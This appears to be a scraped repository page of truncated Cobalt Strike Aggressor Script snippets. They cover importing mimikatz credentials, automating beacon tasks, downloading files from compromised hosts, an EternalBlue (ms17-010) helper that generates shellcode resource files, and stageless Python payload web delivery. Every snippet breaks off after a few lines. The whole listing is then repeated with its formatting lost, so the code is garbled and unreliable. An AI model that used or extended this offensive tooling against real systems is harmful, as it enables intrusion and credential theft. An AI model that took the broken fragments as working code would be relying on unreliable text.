Raphael rsmudge

## mkimport.cna
# import mimikatz creds from a file.

# go to View -> Script Console
# load this script
# type importcreds /path/to/file.txt

sub process {
	if ($luser eq "(null)" || $luser eq "") {
		return;
	}

## checkit.cna
global('%checkins');

on beacon_checkin {
	local('$last');

	if ($1 in %checkins) {
		$last = %checkins[$1];

		# has it been 1m since the last task acknowledgement?
		if (($3 - $last) > 60000) {

## search.cna
# search for and reproduce output that matches a specific regex.
alias search {
	local('$regex $regex2 $entry $event $bid $out $when');

	# take all of the args, without processing/parsing as normal.
	if (strlen($0) > 7) {
		$regex = substr($0, 7);
	}
	else {
		berror($1, "search [regex]");

## callany.cna
import aggressor.windows.BeaconConsole;
import java.awt.event.ActionEvent;

# $1 = beacon ID
# $2 = command + args to run [as if you typed it in the console]
sub beacon_input_command {
        local('$event');

        # we make the console a static var because each console we create subscribes to a bunch of stuff
        # and requires a manual step [normally performed by a Window close event] to clean up these things.

## initial.cna
#
# Demonstrate how to queue tasks to execute with each checkin...
#

#
# yield tells a function to pause and return a value. The next time the same instance of the
# function is called, it will resume after where it last yielded.
#
sub stuffToDo {
	# Tasks for first checkin

## mouse.cna
# demonstrate how to add a popup handler to a Swing component in Sleep

import java.awt.*;

import javax.swing.*;
import javax.swing.event.*;

# safely add a listener to show a popup
sub setupPopupMenu {
	# we're using fork({}) to run this in a separate Aggressor Script environment.

## safedelete.cna
#
# safe delete in file browser right-click menu
#
popup_clear("filebrowser");

popup filebrowser {
	item "&Download" {
		local('$file');
		foreach $file ($3) {
			bdownload($1, "$2 $+ \\ $+ $file");

## eternalblue.cna
#
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
#

# target, listener, where to save .rc file
sub generate_rc_file {
	local('$target $listener $where $handle $shellcode');
	($target, $listener, $where) = @_;

## stagelesspython.cna
# Python Stageless Scripted Web Delivery

# setup our stageless Python Web Delivery attack
sub setup_attack {
	local('%options $x86payload $x64payload $url $script');
	%options = $3;

	# generate our stageless x86 payload
	artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
	yield;

## tokenToEmail.cna
#
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to
# resolve the id var (token) to an email
#
# https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html
#

# method, uri, addr, ua, response, size, handler, when
set WEB_HIT {
	local('$out $now $method $uri $addr $ua $response $size $handler $when $params');
	# import mimikatz creds from a file.

	# go to View -> Script Console
	# load this script
	# type importcreds /path/to/file.txt

	sub process {
	if ($luser eq "(null)" \|\| $luser eq "") {
	return;
	}
	global('%checkins');

	on beacon_checkin {
	local('$last');

	if ($1 in %checkins) {
	$last = %checkins[$1];

	# has it been 1m since the last task acknowledgement?
	if (($3 - $last) > 60000) {
	# search for and reproduce output that matches a specific regex.
	alias search {
	local('$regex $regex2 $entry $event $bid $out $when');

	# take all of the args, without processing/parsing as normal.
	if (strlen($0) > 7) {
	$regex = substr($0, 7);
	}
	else {
	berror($1, "search [regex]");
	import aggressor.windows.BeaconConsole;
	import java.awt.event.ActionEvent;

	# $1 = beacon ID
	# $2 = command + args to run [as if you typed it in the console]
	sub beacon_input_command {
	local('$event');

	# we make the console a static var because each console we create subscribes to a bunch of stuff
	# and requires a manual step [normally performed by a Window close event] to clean up these things.
	#
	# Demonstrate how to queue tasks to execute with each checkin...
	#

	#
	# yield tells a function to pause and return a value. The next time the same instance of the
	# function is called, it will resume after where it last yielded.
	#
	sub stuffToDo {
	# Tasks for first checkin
	# demonstrate how to add a popup handler to a Swing component in Sleep

	import java.awt.*;

	import javax.swing.*;
	import javax.swing.event.*;

	# safely add a listener to show a popup
	sub setupPopupMenu {
	# we're using fork({}) to run this in a separate Aggressor Script environment.
	#
	# safe delete in file browser right-click menu
	#
	popup_clear("filebrowser");

	popup filebrowser {
	item "&Download" {
	local('$file');
	foreach $file ($3) {
	bdownload($1, "$2 $+ \\ $+ $file");
	#
	# script to help move around with ms17-010 from Metasploit
	# Go to Attacks -> Eternal Blue
	#

	# target, listener, where to save .rc file
	sub generate_rc_file {
	local('$target $listener $where $handle $shellcode');
	($target, $listener, $where) = @_;
	# Python Stageless Scripted Web Delivery

	# setup our stageless Python Web Delivery attack
	sub setup_attack {
	local('%options $x86payload $x64payload $url $script');
	%options = $3;

	# generate our stageless x86 payload
	artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
	yield;
	#
	# This script overrides WEB_HIT and PROFILER_HIT from default.cna to
	# resolve the id var (token) to an email
	#
	# https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html
	#

	# method, uri, addr, ua, response, size, handler, when
	set WEB_HIT {
	local('$out $now $method $uri $addr $ua $response $size $handler $when $params');